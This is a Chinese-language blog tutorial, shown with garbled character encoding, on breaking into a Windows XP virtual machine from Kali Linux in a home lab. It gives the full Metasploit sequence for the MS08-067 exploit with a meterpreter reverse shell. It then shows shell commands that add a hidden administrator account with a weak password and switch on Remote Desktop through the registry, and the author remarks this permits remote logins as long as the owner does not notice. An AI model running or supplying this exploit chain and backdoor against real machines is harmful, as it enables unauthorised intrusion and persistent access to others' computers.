kali入侵windows

因?yàn)槲沂且粋€(gè)愛(ài)好和平的人(捂嘴笑)粱坤,所以就在虛擬機(jī)中座慰,創(chuàng)建二個(gè)系統(tǒng)坝疼,一個(gè)kali,一個(gè)windows xp闸英,來(lái)進(jìn)行這次入侵實(shí)驗(yàn)锯岖,以此邁入hacke的大門(mén)。


實(shí)驗(yàn)環(huán)境

實(shí)驗(yàn)環(huán)境.jpg

試驗(yàn)工具

kaili linux 百度百科
其預(yù)裝了許多試驗(yàn)工具甫何,包括nmap 出吹、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] 用戶可通過(guò)硬盤(pán)辙喂、live CD或live USB運(yùn)行Kali Linux捶牢。


Metasploit 百度百科
Metasploit是一個(gè)免費(fèi)的、可下載的框架巍耗,通過(guò)它可以很容易地獲取秋麸、開(kāi)發(fā)并對(duì)計(jì)算機(jī)軟件漏洞實(shí)施攻擊。它本身附帶數(shù)百個(gè)已知軟件漏洞的專業(yè)級(jí)漏洞攻擊工具炬太。


知識(shí)點(diǎn)綜述

1.0 熟悉虛擬機(jī)vmware的相關(guān)知識(shí)灸蟆,因?yàn)楸经h(huán)境是在VM中進(jìn)行的,需要安裝kaili linux和windows xp亲族,以及設(shè)計(jì)虛擬機(jī)網(wǎng)絡(luò)炒考,其可以參考文章:vmware14.0知識(shí)點(diǎn)手冊(cè).
2.0 計(jì)算機(jī)網(wǎng)絡(luò)相關(guān)知識(shí)點(diǎn)。
2.1 vmware的虛擬網(wǎng)絡(luò)

與物理交換機(jī)相似霎迫,虛擬交換機(jī)也能將網(wǎng)絡(luò)連接組件連接在一起斋枢。虛擬交換機(jī)又稱為虛擬網(wǎng)絡(luò),其名稱為VMnet0知给、VMnet1瓤帚、VMnet2,以此類(lèi)推。有少量虛擬交換機(jī)會(huì)默認(rèn)映射到特定網(wǎng)絡(luò)缘滥。

虛擬網(wǎng)絡(luò)適配器模型.jpg
虛擬網(wǎng)絡(luò)交換機(jī).jpg

橋接模式網(wǎng)絡(luò)連接
橋接模式網(wǎng)絡(luò)連接通過(guò)使用主機(jī)系統(tǒng)上的網(wǎng)絡(luò)適配器將虛擬機(jī)連接到網(wǎng)絡(luò)

橋接.jpg

NAT 模式網(wǎng)絡(luò)連接
使用 NAT 模式網(wǎng)絡(luò)時(shí)轰胁,虛擬機(jī)在外部網(wǎng)絡(luò)中不必具有自己的 IP 地址。主機(jī)系統(tǒng)上會(huì)建立單獨(dú)的專用網(wǎng)絡(luò)朝扼。

NAT網(wǎng)絡(luò).jpg

僅主機(jī)模式網(wǎng)絡(luò)連接
僅主機(jī)模式網(wǎng)絡(luò)連接可創(chuàng)建完全包含在主機(jī)中的網(wǎng)絡(luò)赃阀。

主機(jī)模式.jpg

2.2 IP(這里是ipv4)地址分類(lèi),網(wǎng)絡(luò)類(lèi)型擎颖。

ip地址榛斯,由《net-id,host-id》二部分組成。根據(jù)網(wǎng)絡(luò)號(hào)的位數(shù)搂捧,把ip劃分為A,B,C,D,E幾大類(lèi)驮俗,其中A類(lèi)(0,127),B類(lèi)(128,191),C類(lèi)(192,223)

3.0 VMWare虛擬機(jī)提供的橋接、nat和主機(jī)模式的區(qū)別

所以本次試驗(yàn)的虛擬機(jī)網(wǎng)絡(luò)采用橋接方式允跑,所以主要介紹下橋接王凑。

bridged(橋接模式)
在這種模式下,VMWare虛擬出來(lái)的操作系統(tǒng)就像是局域網(wǎng)中的一臺(tái)獨(dú)立的主機(jī)聋丝,它可以訪問(wèn)網(wǎng)內(nèi)任何一臺(tái)機(jī)器索烹。
在橋接模式下,因?yàn)槭仟?dú)立的主機(jī)系統(tǒng)弱睦,那么就需要為虛擬系統(tǒng)配置IP百姓、子網(wǎng)掩碼。
使用橋接模式的虛擬系統(tǒng)和宿主機(jī)器的關(guān)系况木,就像連接在同一個(gè)Hub上的兩臺(tái)電腦垒拢。想讓它們相互通訊,你就需要為虛擬系統(tǒng)配置IP地址和子網(wǎng)掩碼火惊,否則就無(wú)法通信求类。而且還要和宿主機(jī)器處于同一網(wǎng)段,這樣虛擬系統(tǒng)才能和宿主機(jī)器進(jìn)行通信屹耐。


重要細(xì)節(jié)

1.0 因?yàn)樵趘mware模擬kaili入侵windows xp所以要保證這二臺(tái)虛擬機(jī)可以通信尸疆,試驗(yàn)的vmware采用橋接網(wǎng)絡(luò),二臺(tái)虛擬機(jī)相當(dāng)于獨(dú)立的主機(jī)张症,在vmware想要通信,必須處于同一網(wǎng)段(就是網(wǎng)絡(luò)號(hào)要一樣)鸵贬,二臺(tái)主機(jī)設(shè)置kaili設(shè)置為192.168.201.133,windows xp設(shè)置為192.168.201.135,它們是C類(lèi)ip俗他,前3位是網(wǎng)絡(luò)號(hào),都是192.168.201相同阔逼,可以通信兆衅,可以采用ping命令進(jìn)行。
2.0 為了試驗(yàn)效果明顯,最好關(guān)閉掉windows的防火墻羡亩,這樣入侵更容易摩疑,而且自己原本的主機(jī)把殺毒軟件也關(guān)閉了。


入侵開(kāi)始

1.0 查看linux的ip地址

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.201.133  netmask 255.255.255.0  broadcast 192.168.201.255
        inet6 fe80::20c:29ff:fecc:87cf  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:cc:87:cf  txqueuelen 1000  (Ethernet)
        RX packets 30  bytes 2530 (2.4 KiB)
        RX errors 0  dropped 5  overruns 0  frame 0
        TX packets 51  bytes 3303 (3.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 52  bytes 3756 (3.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 52  bytes 3756 (3.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

這里可以看出我的ip地址為192.168.201.133畏铆。如果想要修改ip地址可以采用 ifconfig eth0 192.168.201.136 命令

其中127.0.0.1 127.0.0.1是回送地址雷袋,指本地機(jī),一般用來(lái)測(cè)試使用辞居】回送地址(127.x.x.x)是本機(jī)回送地址(Loopback Address),即主機(jī)IP堆棧內(nèi)部的IP地址瓦灶,主要用于網(wǎng)絡(luò)軟件測(cè)試以及本地機(jī)進(jìn)程間通信鸠删,無(wú)論什么程序,一旦使用回送地址發(fā)送數(shù)據(jù)贼陶,協(xié)議軟件立即返回刃泡,不進(jìn)行任何網(wǎng)絡(luò)傳輸。

2.0 ping命令,測(cè)試linux和windows是否可以通信

root@kali:~# ping -c 2 192.168.201.135
PING 192.168.201.135 (192.168.201.135) 56(84) bytes of data.
64 bytes from 192.168.201.135: icmp_seq=1 ttl=128 time=13.5 ms
64 bytes from 192.168.201.135: icmp_seq=2 ttl=128 time=0.395 ms

--- 192.168.201.135 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 0.395/6.986/13.578/6.592 ms

linux的ping和windows有所不同碉怔,如果不設(shè)置次數(shù)會(huì)一直ping下去烘贴。

root@kali:~# ping
Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 ...] destination

3.0 開(kāi)啟SQL數(shù)據(jù)庫(kù)服務(wù)

root@kali:~# service postgresql start 

4.0 終端執(zhí)行msfconsole 命令

root@kali:~# msfconsole 
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

使用help命令查看其參數(shù)和用法

msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    irb           Drop into irb scripting mode
    load          Load a framework plugin
    quit          Exit the console
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers


Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    edit          Edit the current module with the preferred editor
    info          Displays information about one or more modules
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Selects a module by name


Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job


Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file


Database Backend Commands
=========================

    Command           Description
    -------           -----------
    db_connect        Connect to an existing database
    db_disconnect     Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache
    db_status         Show the current database status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces


Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database

5.0 運(yùn)行search netapi命令搜索netapi,在metasploip框架中列出所有與netapi相關(guān)的漏洞利用代碼

msf > search  netapi

Matching Modules
================

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   exploit/windows/smb/ms03_049_netapi  2003-11-11       good    MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms06_040_netapi  2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great   MS08-067 Microsoft Server Service Relative Path Stack Corruption

可以看到最后一個(gè)漏洞利用代碼的評(píng)級(jí)為great眨层,所以優(yōu)先使用ms08_067_netapi庙楚。
show tagrgets可以查看攻擊平臺(tái)
show opinions可以查看攻擊需要設(shè)置那些參數(shù)
show payloads可以查看使用的攻擊載荷

6.0使用 use exploit/windows/smb/ms08_067_netapi ,設(shè)置參數(shù)

msf > use exploit/windows/smb/ms08_067_netapi 

msf exploit(ms08_067_netapi) > set rhost 192.168.201.135
rhost => 192.168.201.135
msf exploit(ms08_067_netapi) > check
[+] 192.168.201.135:445 The target is vulnerable.
msf exploit(ms08_067_netapi) > set lhost 192.168.201.133
lhost => 192.168.201.133
msf exploit(ms08_067_netapi) > set target 34
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports 
payload => windows/meterpreter/reverse_tcp_allports

msf exploit(ms08_067_netapi) > exploit 
[*] Started reverse TCP handler on 192.168.201.133:1 
[*] 192.168.201.135:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 192.168.201.135
[*] Meterpreter session 1 opened (192.168.201.133:1 -> 192.168.201.135:1031) at 2017-10-27 23:03:20 +0800

set rhost是設(shè)置目標(biāo)主機(jī)ip
setset lhost設(shè)置本機(jī)ip
set payload設(shè)置攻擊載荷
exploit,是實(shí)行攻擊趴樱,如果成功馒闷,會(huì)得到一個(gè)session,可以使用meterpreter模板進(jìn)一步提取

7.0 輸入shell叁征,獲取受控zhuji的shel纳账,我這里是windows的dos。

meterpreter > shell
Process 1968 created.
Channel 1 created.
Microsoft Windows XP [錕芥本 5.1.2600]
(C) 錕斤拷權(quán)錕斤拷錕斤拷 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user ztg 123456 /add
net user ztg 123456 /add
錕絞伙拷錕窖撅拷錕斤拷錕節(jié)★拷

錕斤拷錕斤拷錕斤拷 NET HELPMSG 2224 錕皆伙拷錕矯革拷錕斤拷錕僥幫拷錕斤拷錕斤拷


C:\WINDOWS\system32>net localgroup administrators ztg /add
net localgroup administrators ztg /add
錕斤拷錕斤拷系統(tǒng)錕斤拷錕斤拷 1378錕斤拷

錕斤拷錕斤拷錕絞伙拷錕斤拷錕斤拷錕角憋拷錕斤拷錕斤拷錕僥籌拷員錕斤拷


C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

錕斤拷錕斤拷錕繳癸拷錕斤拷錕斤拷

C:\WINDOWS\system32>netstat -an 
netstat -an 

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.201.135:139    0.0.0.0:0              LISTENING
  TCP    192.168.201.135:1031   192.168.201.133:1      ESTABLISHED
  UDP    0.0.0.0:445            *:*                    
  UDP    0.0.0.0:500            *:*                    
  UDP    0.0.0.0:4500           *:*                    
  UDP    127.0.0.1:123          *:*                    
  UDP    127.0.0.1:1025         *:*                    
  UDP    127.0.0.1:1900         *:*                    
  UDP    192.168.201.135:123    *:*                    
  UDP    192.168.201.135:137    *:*                    
  UDP    192.168.201.135:138    *:*                    
  UDP    192.168.201.135:1900   *:*                    

C:\WINDOWS\system32>ipconfig -all
ipconfig -all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : dflx
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter 錕斤拷錕斤拷錕斤拷錕斤拷:

        Connection-specific DNS Suffix  . : 
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-0C-29-04-23-53
        Dhcp Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 192.168.201.135
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 

進(jìn)入windows界面捺疼,dos大神可以暢通無(wú)阻了疏虫,不過(guò)如果喜歡windows界面,可以安裝上面的方法啤呼,進(jìn)行操作卧秘,在遠(yuǎn)程桌面。

net user ztg 123456 /add

添加一個(gè)用戶名為ztg官扣,密碼123456

C:\WINDOWS\system32>net localgroup administrators ztg /add
net localgroup administrators ztg /add

把ztg添加到管理員用戶組

C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

是手動(dòng)開(kāi)啟3389(遠(yuǎn)程桌面連接端口)


在利用遠(yuǎn)程桌面翅敌,登陸別人的電腦,進(jìn)行相關(guān)的操作了惕蹄。告訴你一個(gè)小細(xì)節(jié)蚯涮,在目標(biāo)機(jī)中會(huì)出現(xiàn)你建立的管理員賬號(hào)喔治专,可以多少遠(yuǎn)程登錄了,只要對(duì)方?jīng)]有發(fā)現(xiàn)遭顶。

有沒(méi)有人來(lái)黑我一下罢欧濉(捂嘴笑)。我的ip:127.0.0.1棒旗,系統(tǒng)是windows 10 64位家庭版喘批。

哎,這幾天沒(méi)有跑步嗦哆,今天早上終于跑了谤祖,感冒了一整個(gè)十月,現(xiàn)在還在感冒中老速,哭死粥喜,哭死。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末橘券,一起剝皮案震驚了整個(gè)濱河市额湘,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌旁舰,老刑警劉巖锋华,帶你破解...
    沈念sama閱讀 211,123評(píng)論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異箭窜,居然都是意外死亡毯焕,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,031評(píng)論 2 384
  • 文/潘曉璐 我一進(jìn)店門(mén)磺樱,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)纳猫,“玉大人,你說(shuō)我怎么就攤上這事竹捉∥咴” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 156,723評(píng)論 0 345
  • 文/不壞的土叔 我叫張陵块差,是天一觀的道長(zhǎng)侵续。 經(jīng)常有香客問(wèn)我,道長(zhǎng)憨闰,這世上最難降的妖魔是什么状蜗? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 56,357評(píng)論 1 283
  • 正文 為了忘掉前任,我火速辦了婚禮鹉动,結(jié)果婚禮上轧坎,老公的妹妹穿的比我還像新娘。我一直安慰自己训裆,他們只是感情好眶根,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,412評(píng)論 5 384
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著边琉,像睡著了一般属百。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上变姨,一...
    開(kāi)封第一講書(shū)人閱讀 49,760評(píng)論 1 289
  • 那天族扰,我揣著相機(jī)與錄音,去河邊找鬼定欧。 笑死渔呵,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的砍鸠。 我是一名探鬼主播扩氢,決...
    沈念sama閱讀 38,904評(píng)論 3 405
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼爷辱!你這毒婦竟也來(lái)了录豺?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 37,672評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤饭弓,失蹤者是張志新(化名)和其女友劉穎双饥,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體弟断,經(jīng)...
    沈念sama閱讀 44,118評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡咏花,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,456評(píng)論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了阀趴。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片昏翰。...
    茶點(diǎn)故事閱讀 38,599評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖舍咖,靈堂內(nèi)的尸體忽然破棺而出矩父,到底是詐尸還是另有隱情,我是刑警寧澤排霉,帶...
    沈念sama閱讀 34,264評(píng)論 4 328
  • 正文 年R本政府宣布窍株,位于F島的核電站,受9級(jí)特大地震影響攻柠,放射性物質(zhì)發(fā)生泄漏球订。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,857評(píng)論 3 312
  • 文/蒙蒙 一瑰钮、第九天 我趴在偏房一處隱蔽的房頂上張望冒滩。 院中可真熱鬧,春花似錦浪谴、人聲如沸开睡。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,731評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)篇恒。三九已至扶檐,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間胁艰,已是汗流浹背款筑。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 31,956評(píng)論 1 264
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留腾么,地道東北人奈梳。 一個(gè)月前我還...
    沈念sama閱讀 46,286評(píng)論 2 360
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像解虱,于是被迫代替她去往敵國(guó)和親攘须。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,465評(píng)論 2 348

推薦閱讀更多精彩內(nèi)容